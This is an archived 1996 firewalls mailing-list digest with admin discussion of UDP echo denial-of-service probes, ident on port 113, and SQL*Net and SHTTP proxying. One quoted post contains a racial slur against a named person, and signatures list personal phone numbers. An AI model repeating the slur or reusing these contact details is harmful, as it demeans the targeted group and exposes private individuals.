11 Feb 1996 22:30:22 -0800 From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com(204.147.227.68) by mycroft via smap (V1.3mjr) id sma008108; Sun Feb 11 22:30:05 1996 Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id RAA08602; Sun, 11 Feb 1996 17:08:02 -0800 (PST) Message-Id: <199602120108.RAA08602@count04.mry.scruznet.com> To: Dale Lancaster cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: NT Firewalls/Web Servers -Reply In-reply-to: Your message of "Sat, 10 Feb 1996 17:28:06 MST." <2.2.32.19960211002806.006aa1c8@netcom.com> Date: Sun, 11 Feb 1996 17:08:02 -0800 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stop with the sales talk PLEASE!!! or take it to email... cheers From firewalls-owner Mon Feb 12 02:39:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA10704 for firewalls-outgoing; Mon, 12 Feb 1996 02:35:25 -0800 (PST) Received: from relay-2.mail.demon.net (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA10684 for ; Mon, 12 Feb 1996 02:34:32 -0800 (PST) Received: from theboard.reednews.co.uk ([194.159.23.1]) by relay-2.mail.demon.net id aa01703; 12 Feb 96 10:33 GMT Received: by newsquest.co.uk (5.x/SMI-SVR4) id AA07566; Mon, 12 Feb 1996 10:35:06 GMT From: Gavin Aiken Message-Id: <9602121035.AA07566@newsquest.co.uk> Subject: Re: anybody know of any vulnerabilities with "echo" To: Firewalls List Date: Mon, 12 Feb 1996 10:35:05 +0000 (GMT) X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Hi Folks, > > > > At a particular Internet firewall I administer, I've noticed a rash of > > "echo" (udp port 7) service attempts. These came on pretty suddenly (as if > > a whole shwack of people found something out) and are pretty constant now. > > > > I'm wondering if a new vulnerablity with the (a particular implementation > > maybe) echo server has been found. Anybody else notice this trend?? > > > I wonder, this smells heavily of the "Harverst cache Web server". > Harvest uses some pretty wild checks on upstream web sites to see if > they're up or not - the default is to "ping" the host using UDP echo > packets - that could be what you're seeing. > Of course, it goes without saying that such sites shouldn't set up such > things without ASKING those sites first... Two comments on these posts: 1/ This sudden rash of UDP packets: have you seen CERT(sm) Advisory CA-96.01, dated February 8, 1996? The topic is UDP Port Denial-of-Service Attack, and they detail network attacks based on the echo and chargen services. Need I say more? 2/ At our site, the firewall was already chucking away all the UDP rubbish coming through from the 'net, but I have now also disabled the echo etc services on the firewall host. Does this mean that Harvest might decide our web server is down, as it can't ping our domain in the way mentioned above? Or is it clever enough to try other methods as well? Are there any other 'clever' bits of software out there that might decide our site is dead? Comments? (flames to my personal email :)) -- Gavin Aiken, "is the internet down?" administrator ----------------------------------------------------------------------------- Address: Gavin Aiken | Email: gavin@newsquest.co.uk IT Dept, RRN Lancs | Web: www.newsquest.co.uk Newspaper House | Work: +44 (0)1254 678678 High Street | Fax: +44 (0)1254 673347 Blackburn | Home: +44 (0)1254 812956 ----------------------------------------------------------------------------- *finger gavin@theboard.reednews.co.uk for PGP Public Key* From firewalls-owner Mon Feb 12 04:24:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA13684 for firewalls-outgoing; Mon, 12 Feb 1996 04:11:17 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA13679 for ; Mon, 12 Feb 1996 04:11:11 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA07331; Mon, 12 Feb 96 07:10:28 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA01809; Mon, 12 Feb 96 12:10:34 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9602121210.AA01809@london.csd.harris.com> Subject: Re: anybody know of any vulnerabilities with "echo" To: firewalls@greatcircle.com Date: Mon, 12 Feb 96 12:10:33 GMT In-Reply-To: <9602121035.AA07566@newsquest.co.uk>; from "Gavin Aiken" at Feb 12, 96 10:35 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Maybe I am missing something here. Would not dropping any echo/chargen/time/daytime packet (both udp & tcp) that has a source port less that 1024 be better, rather than total denial of same packets ? If the source port is > 1023, then a ping-pong denial of service cannot be set up (I can see echo and time for instance being bounced between each other). Regards Jon > > > > > Hi Folks, > > > > > > At a particular Internet firewall I administer, I've noticed a rash of > > > "echo" (udp port 7) service attempts. These came on pretty suddenly (as if > > > a whole shwack of people found something out) and are pretty constant now. > > > > > > I'm wondering if a new vulnerablity with the (a particular implementation > > > maybe) echo server has been found. Anybody else notice this trend?? > > > > > > I wonder, this smells heavily of the "Harverst cache Web server". > > Harvest uses some pretty wild checks on upstream web sites to see if > > they're up or not - the default is to "ping" the host using UDP echo > > packets - that could be what you're seeing. > > > Of course, it goes without saying that such sites shouldn't set up such > > things without ASKING those sites first... > > > Two comments on these posts: > > 1/ This sudden rash of UDP packets: have you seen CERT(sm) Advisory CA-96.01, > dated February 8, 1996? The topic is UDP Port Denial-of-Service Attack, > and they detail network attacks based on the echo and chargen services. > Need I say more? > > 2/ At our site, the firewall was already chucking away all the UDP rubbish > coming through from the 'net, but I have now also disabled the echo etc > services on the firewall host. Does this mean that Harvest might decide > our web server is down, as it can't ping our domain in the way mentioned > above? Or is it clever enough to try other methods as well? Are there > any other 'clever' bits of software out there that might decide our site > is dead? > > Comments? (flames to my personal email :)) > > -- > Gavin Aiken, "is the internet down?" administrator > > ----------------------------------------------------------------------------- > Address: Gavin Aiken | Email: gavin@newsquest.co.uk > IT Dept, RRN Lancs | Web: www.newsquest.co.uk > Newspaper House | Work: +44 (0)1254 678678 > High Street | Fax: +44 (0)1254 673347 > Blackburn | Home: +44 (0)1254 812956 > ----------------------------------------------------------------------------- > *finger gavin@theboard.reednews.co.uk for PGP Public Key* > -- Jon Shallow, Harris Computer Systems Corporation Jon.Shallow@mail.hcsc.com Tel +44 (0) 1276 686886 Fax +44 (0) 1276 678733 From firewalls-owner Mon Feb 12 05:24:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14777 for firewalls-outgoing; Mon, 12 Feb 1996 05:11:09 -0800 (PST) Received: from fergie.yacc.co.uk (fergie.yacc.co.uk [193.117.221.71]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14764 for ; Mon, 12 Feb 1996 05:10:59 -0800 (PST) Received: (from smap@localhost) by fergie.yacc.co.uk (8.6.9/8.6.9) id NAA22503 for ; Mon, 12 Feb 1996 13:06:52 GMT Received: from incy-wincy.yacc.co.uk(193.117.221.72) by fergie.yacc.co.uk via smap (V1.3) id sma022435; Mon Feb 12 13:06:24 1996 Received: (from news@localhost) by incy-wincy.yacc.co.uk (8.6.12/8.6.12) id NAA26386; Mon, 12 Feb 1996 13:06:49 GMT To: firewalls@greatcircle.com Path: chris From: chris@yacc.co.uk (Chris Davies) Newsgroups: yacc.mail.firewalls Subject: Re: SQL*Net proxy? Date: 12 Feb 1996 13:06:48 GMT Organization: yacc labs, Leeds, UK Lines: 19 Message-ID: <4fne18$p10@incy-wincy.yacc.co.uk> References: <4f642b$ccm@incy-wincy.yacc.co.uk> NNTP-Posting-Host: fergie.yacc.co.uk X-Newsreader: TIN [version 1.2 PL2] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tom Cooper (asec@access.digex.net) wrote: : Has anyone successfully configured a proxy for outbound/inbound SQL*Net : transactions? I've not tested it very fully, but the TIS plug-gw appears to work for me. : In my observations, Unix to Unix server communications take place on a : designated port, but PC to Unix communications switch port numbers after : about 20-25 packets. : The PC always sends to the designated port, but the Unix server changes : to a different port. This makes filtering difficult. I can't say that I've seen this. I presme you're referring to SQL*Net v2? Chris -- yacc Labs, Leeds, UK. (tel +44 113 287-2381, email chris@yacc.co.uk) From firewalls-owner Mon Feb 12 05:57:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15508 for firewalls-outgoing; Mon, 12 Feb 1996 05:42:28 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA15492 for ; Mon, 12 Feb 1996 05:42:23 -0800 (PST) Received: from clark.net (wbak@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id IAA00470; Mon, 12 Feb 1996 08:41:39 -0500 (EST) Received: (from wbak@localhost) by clark.net (8.7.1/8.7.1) id IAA22571; Mon, 12 Feb 1996 08:41:38 -0500 (EST) Date: Mon, 12 Feb 1996 08:41:38 -0500 (EST) From: wayne bak To: LLOYD HARTE cc: firewalls@GreatCircle.COM Subject: Re: RMON Data In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Connect www.desktalk.com and the will send you a demo copy TRENDsnmp which also collects RMON data, it's a long term network analysis tool. You can also email marci@desktalk.com. Wayne On Wed, 7 Feb 1996, LLOYD HARTE wrote: > Greetings, > > This is a little outside of a firewall question but I was wondering if any > one could point me in the direction of where I could find formulas for > analyzing RMON data. I want to calculate things like utilization, error > rates, etc. I have looked at one tool, Axon LANreporter but it only looks > at one days' worth of info and I would like to review, weeks, months, > etc. Any assistance would be great! > > LHARTE@OCEANSPRAY.COM > > From firewalls-owner Mon Feb 12 06:09:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA16145 for firewalls-outgoing; Mon, 12 Feb 1996 05:59:11 -0800 (PST) Received: from mailman.nsf.gov (mailman.nsf.gov [128.150.11.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA16140 for ; Mon, 12 Feb 1996 05:59:07 -0800 (PST) Received: from mmorse.ois.nsf.gov by mailman.nsf.gov with SMTP id AA13642 (5.65c/IDA-1.4.4 for ); Mon, 12 Feb 1996 09:00:51 -0500 Date: Mon, 12 Feb 1996 09:00:51 -0500 Message-Id: <199602121400.AA13642@mailman.nsf.gov> X-Sender: mmorse@note1.nsf.gov X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Robert Dana , firewalls@greatcircle.com From: Michael Morse Subject: Re: I want details!!! Re: NT's TCP/IP stack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >OK, I'm getting really frustrated about the lack of details about NT's >deficiencies. I couldn't care less about OS bigotry- I'll use whatever systems >meet my needs (which often include security). I have seen, over and over >again, posts that basically say "I've personally verified that NT sucks for >{security, networking, multitasking, Internet services}. Don't believe the MS >marketing hype". > >For example: > >Scott Barman writes: >> Hopefully, when folks put NT on the internet, they will find the same >> thing I found through experimentation: it has multitasking that can't >> get out of its own way, it can't handle the load of a medium-low >> environment, and if something goes wrong, there isn't a quick interface >> to fix things (by passing that maze of twisty little menus all >> different!). I think you are asking too much (and too little) of Usenet (or mailing lists). The people who post here are not paid to do so, so it's unlikely they are going to take the time to perform a rigorous study and prepare a report. Nonetheless, this post you use as an example does have valuable information in it. You know that Scott feels that the performance is only appropriate for a low volume environment, and that the menu structure was non-intuitive and too lengthy for his tastes, and that this is not hearsay, that he's actually had some personal experience. Interestingly, this is the same message I've found in published reviews of NT Web servers, where the writer *was* paid, and did take the time to compare a bunch of different systems on different OS. Take all you read on the net with a very large grain of salt. Try to read between the lines. The fact that Scott hasn't said that the thing doesn't work is important information. Maybe NT would be just the thing for that low volume application you have where the sysadmin is not comfortable with command line processing. OS bigotry is not something you are likely to vanquish with Usenet postings. Better to see it for what it is, an amusing fact of life among supposedly keen analytical computer minds. Just keep it in mind when you evaluate what you read. And whatever you read, verify independently (and post the results). --Mike From firewalls-owner Mon Feb 12 07:24:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA18477 for firewalls-outgoing; Mon, 12 Feb 1996 07:12:41 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA18472 for ; Mon, 12 Feb 1996 07:12:37 -0800 (PST) Received: by inet1.tek.com id ; Mon, 12 Feb 1996 07:11:56 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma024342; Mon Feb 12 07:11:42 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA02889; Mon, 12 Feb 96 07:11:40 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA19501; Mon, 12 Feb 96 07:13:30 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA01236; Mon, 12 Feb 96 07:10:29 PST Date: Mon, 12 Feb 1996 07:10:28 -0800 (PST) From: Kent Dahlgren To: Brosl Hasslacher Cc: firewalls@greatcircle.COM Subject: Re: your mail In-Reply-To: <199602110124.RAA24100@azazel.sdsc.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 10 Feb 1996, Brosl Hasslacher wrote: > It seems that once again, that slanty-eyed chink Tsutomu has made another > dollar at the expense of a hacker, Kevin Mitnick. > "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes down the sewer....at least in my eyes. And I'm a good ol white boy from the Pacific Northwest. Lame lame lame lame..... "Any ideas expressed here may not reflect those of my employers" ______________________________________________________________________________ ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ / Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com Fax: 1.503.685.3063 WWW: www.tek.com BBS: 1.503.685.4504 E-World: Keyword Tektronix HAL: 1.503.682.7450 AOL: Keyword Tektronix Service: 1.800.835.6100 FTP: ftp.tek.com ______________________________________________________________________________ From firewalls-owner Mon Feb 12 07:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19326 for firewalls-outgoing; Mon, 12 Feb 1996 07:51:26 -0800 (PST) Received: from diablo.ppp.de (diablo.ppp.de [193.141.101.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19299 for ; Mon, 12 Feb 1996 07:51:18 -0800 (PST) Received: from wmdhh by diablo.ppp.de with uucp (Smail3.1.28.1 #1) id m0tm0WN-0006xzC; Mon, 12 Feb 96 16:50 MET Received: from rs3.wmd.de by wmdhh with smtp (Smail3.1.26.7 #3) id m0tm0qT-0002VYC; Mon, 12 Feb 96 17:11 CET Received: by rs3.wmd.de (AIX 3.2/UCB 5.64/4.03.01) id AA23658; Mon, 12 Feb 1996 15:55:48 +0100 From: pauck@rs3.wmd.de (Marco Pauck) Message-Id: <9602121455.AA23658@rs3.wmd.de> Subject: Re: SQL*Net proxy? To: chris@yacc.co.uk (Chris Davies) Date: Mon, 12 Feb 1996 15:55:48 +0100 (MEZ) Cc: firewalls@GreatCircle.COM In-Reply-To: <4fne18$p10@incy-wincy.yacc.co.uk> from "Chris Davies" at Feb 12, 96 01:06:48 pm Reply-To: pauck@wmd.de X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Tom Cooper (asec@access.digex.net) wrote: > : Has anyone successfully configured a proxy for outbound/inbound SQL*Net > : transactions? > > I've not tested it very fully, but the TIS plug-gw appears to work for me. Me too. > : In my observations, Unix to Unix server communications take place on a > : designated port, but PC to Unix communications switch port numbers after > : about 20-25 packets. > > : The PC always sends to the designated port, but the Unix server changes > : to a different port. This makes filtering difficult. > > I can't say that I've seen this. I presme you're referring to > SQL*Net v2? We use plug-gw for SQL*Net v2 as well. There are possibly ways to configure V2 that plug-gw can't deal with, but with our plain-vanilla configuration it works OK. > Chris Marco -- Marco Pauck - WMD GmbH Hamburg, Germany - http://www.wmd.de/ e-mail: pauck@wmd.de, phone: +49-40-58958-120, fax: +49-40-58958-199 Life would be so much easier if we could just see the source code. From firewalls-owner Mon Feb 12 09:21:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA21829 for firewalls-outgoing; Mon, 12 Feb 1996 09:08:35 -0800 (PST) Received: from rugrat.glyphic.com (ns.glyphic.com [205.164.126.161]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA21824 for ; Mon, 12 Feb 1996 09:08:31 -0800 (PST) Received: from [205.164.126.163] by rugrat.glyphic.com with smtp (Smail3.1.29.1 #6) id m0tm1jI-000GwzC; Mon, 12 Feb 96 09:07 PST X-Sender: markl@rugrat.glyphic.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 09:12:07 -0800 To: Ron DuFresne From: markl@glyphic.com (Mark Lentczner) Subject: Re: port 113? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk TCP port 113 is the ident service. The idea is that the Web server is asking for the account name that is associated with the TCP connection that came from your machine. At our site we felt it was a bad idea to let this information out just on general principle. Our initial technique was to just block the port in the firewall. This failed because some ill-behaved web servers, will wait for the entire 75 seconds of TCP/IP timeout before deciding that the machine in question doesn't run ident. Only after that will it return the web page on the original connection. Makes browsing kind of slow! Note that it is unreasonable for any web server to require ident service because almost no PCs run it. To make the response times acceptable what we had to allow the 113 packets in to those machines that didn't run ident (Macs and PCs), where the IP stacks would return ICMP "port unreachable" messages immediatly, and thus get the server to give up on ident quickly and return the web page. For machines where we wanted to run ident for internal reasons (some unix boxes) we simply used kernel packet filtering to drop external access to 113 on the floor. (This means that browsing these web sites from the unix boxes is intollerably slow, but these machines are rarely used for browsing, and there are few sites that acutally seem to do this ident stuff.) I suppose that it would be drop dead simple to write a small 'fake' ident for external access that always replied "bob". For example, the following shell script will do the trick! #!/bin/sh # a very simple ident server read QUERY echo $QUERY:OTHER:bob exit 0 Question: Has anyone identified (no pun intended) the web server software that does this useless ident probe? If it is a common server, what option is needed to turn it off. 113 beyond your own secure net is useless (see the useful information the ident server above will return!) and there is no reason for any Internet web server to use it. - Mark ------------------- Mark Lentczner Glyphic Technology 1209 Villa Street Mtn. View, CA 94041 415/964-5311 markl@glyphic.com http://www.glyphic.com/ From firewalls-owner Mon Feb 12 10:25:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22987 for firewalls-outgoing; Mon, 12 Feb 1996 10:07:29 -0800 (PST) Received: from access.mbnet.mb.ca (access.mbnet.mb.ca [130.179.16.143]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22978 for ; Mon, 12 Feb 1996 10:07:18 -0800 (PST) Received: by access.mbnet.mb.ca id AA02546 (5.67b/IDA-1.4.4 for firewalls@GreatCircle.COM); Mon, 12 Feb 1996 12:05:18 -0600 Date: Mon, 12 Feb 1996 12:05:18 -0600 (CST) From: Oliver Friedrichs To: Kent Dahlgren Cc: Brosl Hasslacher , firewalls@GreatCircle.COM Subject: Re: your mail In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You realize this was posted from a hacked account right ? On Mon, 12 Feb 1996, Kent Dahlgren wrote: > > On Sat, 10 Feb 1996, Brosl Hasslacher wrote: > > > It seems that once again, that slanty-eyed chink Tsutomu has made another > > dollar at the expense of a hacker, Kevin Mitnick. > > > > "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes > down the sewer....at least in my eyes. And I'm a good ol white boy from > the Pacific Northwest. Lame lame lame lame..... > > > "Any ideas expressed here may not reflect those of my employers" > ______________________________________________________________________________ > ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ > / > Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com > Fax: 1.503.685.3063 WWW: www.tek.com > BBS: 1.503.685.4504 E-World: Keyword Tektronix > HAL: 1.503.682.7450 AOL: Keyword Tektronix > Service: 1.800.835.6100 FTP: ftp.tek.com > ______________________________________________________________________________ > > From firewalls-owner Mon Feb 12 10:39:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA23543 for firewalls-outgoing; Mon, 12 Feb 1996 10:32:06 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA23538 for ; Mon, 12 Feb 1996 10:32:02 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQacqc16978; Mon, 12 Feb 1996 13:31:19 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA08620; Mon, 12 Feb 96 13:20:36 EST Date: Mon, 12 Feb 1996 13:20:35 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: tkined and firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know the firewall companies have techies lurking on this list even though they never post (my hind brain's intuition). What is the chance of tkined being able to produce a graphical map of a network through a firewall? Come on techies, delurk and edificate us what is less illuminary. Sick Puppy, Song Writer --:: Four and twenty Girl Dawg's, came down from Inverness, ::-- --:: and when the Ball was over, their tails was all a mess, ::-- --:: forget about your father, get your head against wall, ::-- --:: if you never get sniffed on Saturday night, ::-- --:: you'll never get sniffed at all ::-- From firewalls-owner Mon Feb 12 11:24:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA24750 for firewalls-outgoing; Mon, 12 Feb 1996 11:18:23 -0800 (PST) Received: from emout04.mail.aol.com (emout04.mail.aol.com [198.81.10.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA24745 for ; Mon, 12 Feb 1996 11:18:19 -0800 (PST) From: MFTemplar@aol.com Received: by emout04.mail.aol.com (8.6.12/8.6.12) id OAA24356 for firewalls@greatcircle.com; Mon, 12 Feb 1996 14:17:38 -0500 Date: Mon, 12 Feb 1996 14:17:38 -0500 Message-ID: <960212141736_142186765@emout04.mail.aol.com> To: firewalls@greatcircle.com Subject: Harris Computer product viability. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey, I was wondering what the participants in this group thought of Harris Computer's Cyberguard Firewall product. The company's information on it goes as follows: <> The November Data Comm Firewall test rated Harris's product # 2 (CheckPoint's was # 1) but the people at Raptor and Secure Computing say they don't run into Harris at all in the commercial market. Is there any non-governmental/commercial adoption of the Harris Computer Cyberguard product that you know of out in the field and how has it gone? Regards, Randy Befumo From firewalls-owner Mon Feb 12 11:56:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24064 for firewalls-outgoing; Mon, 12 Feb 1996 10:55:37 -0800 (PST) Received: from inet1.tek.com (inet1.tek.com [134.62.48.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24030 for ; Mon, 12 Feb 1996 10:55:11 -0800 (PST) Received: by inet1.tek.com id ; Mon, 12 Feb 1996 10:54:26 -0800 Received: from tektronix.tek.com(134.62.48.24) by inet1 via smap (V1.3) id sma018103; Mon Feb 12 10:54:10 1996 Received: from orca.wv.tek.com by tektronix.TEK.COM (4.1/8.2) id AA21811; Mon, 12 Feb 96 10:53:36 PST Received: from trouble.WV.TEK.COM by orca.wv.tek.com (4.1/8.2) id AA24691; Mon, 12 Feb 96 10:55:27 PST Received: by trouble.WV.TEK.COM (4.1/8.0) id AA01399; Mon, 12 Feb 96 10:52:25 PST Date: Mon, 12 Feb 1996 10:52:24 -0800 (PST) From: Kent Dahlgren To: Oliver Friedrichs Cc: Brosl Hasslacher , firewalls@GreatCircle.COM Subject: Re: your mail In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 12 Feb 1996, Oliver Friedrichs wrote: > You realize this was posted from a hacked account right ? I'll bet dimes to doughnuts the prankster is reading these group postings, snickering to him or herself. Real proud. Probably one of those geeks who spend thier weekends in IRC flooding people. Has the owner of the "hacked" account replied yet? Hey, look what I can do using an ordinary text editor like vi: total 15576 drwx------ 59 total 15576 drwx------ 59 tsutomu 5120 Feb 12 09:35 . drwxr-xr-x 26 root 1024 Feb 9 13:12 .. -rw------- 1 tsutomu 148 Jun 15 1995 .Xauthority -rw------- 1 tsutomu 690 Oct 19 09:13 .cshrc -rw------- 1 tsutomu 4849 Jul 12 1995 .emacs -rw------- 1 tsutomu 555 Jan 3 07:12 .login drwx------ 2 tsutomu 5632 Dec 27 13:07 .netscape-cache Hell, as far as that goes, I can make it look like I hacked anyone's account: total 15576 drwx------ 59 winniethepooh 5120 Feb 12 09:35 . drwxr-xr-x 26 root 1024 Feb 9 13:12 .. -rw------- 1 winniethepooh 148 Jun 15 1995 .Xauthority -rw------- 1 winniethepooh 690 Oct 19 09:13 .cshrc -rw------- 1 winniethepooh 4849 Jul 12 1995 .emacs -rw------- 1 winniethepooh 555 Jan 3 07:12 .login drwx------ 2 winniethepooh 5632 Dec 27 13:07 .netscape-cache Man, this wild wacky world of hacking is really cool! Maybe I'll get chicks! Maybe I'll get a life! From firewalls-owner Mon Feb 12 11:59:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25382 for firewalls-outgoing; Mon, 12 Feb 1996 11:43:19 -0800 (PST) Received: from is2.NYU.EDU (IS2.NYU.EDU [128.122.250.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA25377 for ; Mon, 12 Feb 1996 11:43:12 -0800 (PST) Received: from [206.98.202.100] by is2.NYU.EDU; (5.65v3.0/1.1.8.2/23Sep94-1121PM) id AA21748; Mon, 12 Feb 1996 14:42:19 -0500 Received: by SPERFNET.cscmicro.com with Microsoft Mail id <01BAF958.19AB3980@SPERFNET.cscmicro.com>; Mon, 12 Feb 1996 14:40:48 -0500 Message-Id: <01BAF958.19AB3980@SPERFNET.cscmicro.com> From: Shoel Perelman To: "'firewalls@greatcircle.com'" Subject: SHTTP/SSL Proxies? Date: Mon, 12 Feb 1996 14:40:35 -0500 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been using FWTK to proxy http, but now I realize that users want = to access shttp pages. Are there any "free" solutions like fwtk to do = this? I tried using plug-gw from fwtk to do this on port 443, but it = doesn't see to work. Has anybody successfully configured a shttp proxy? = If so, what package did you use? A "net" or "free" solution is what = I'm really looking for here... Thanks in advance.. -Shoel Perelman sdp4198@is2.nyu.edu From firewalls-owner Mon Feb 12 12:39:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA26676 for firewalls-outgoing; Mon, 12 Feb 1996 12:03:11 -0800 (PST) Received: from hti.net (wally.hti.net [198.70.56.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA26671 for ; Mon, 12 Feb 1996 12:03:06 -0800 (PST) Received: from [198.70.56.77] (dialnet37.hti.net [198.70.56.77]) by hti.net (8.6.12/8.6.9) with SMTP id OAA02281; Mon, 12 Feb 1996 14:17:20 -0600 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 14:00:40 -0600 To: firewalls@GreatCircle.COM From: sengle@hti.net (Steven W. Engle) Subject: Gauntlet 3.1 Packet Filter? Cc: sengle@hti.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny source / destination)? Or it is purely a application level proxy services approach? If I have IP traffic for which there is no proxy for, how can I control this traffic without writing a custom proxy? If it does packet-filter, how (well) are the proxy "rules" integrated with the packet-filtering "rules"? I checked out the TIS web sight and could not find any specific statments toward "yes, it packet filters". -- Steve Engle DHT, Inc. sengle@hti.net From firewalls-owner Mon Feb 12 12:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26404 for firewalls-outgoing; Mon, 12 Feb 1996 11:59:00 -0800 (PST) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA12457 for ; Sun, 11 Feb 1996 11:22:22 -0800 (PST) Received: from maestro.Maestro.COM by relay1.UU.NET with SMTP id QQacmn28348; Sun, 11 Feb 1996 14:21:26 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA22280; Sun, 11 Feb 96 14:10:50 EST Date: Sun, 11 Feb 1996 14:10:49 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Hoo Dat and sniffer log Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Several people requested raw sniffer data. When I installed a sniffer as close to the target as possible and started capturing everything, instead of just the first 256 bytes of data, the sniffer started logging about 2 megabytes per minutes. Sometimes very interesting stuff shows up. See corresponding CERT 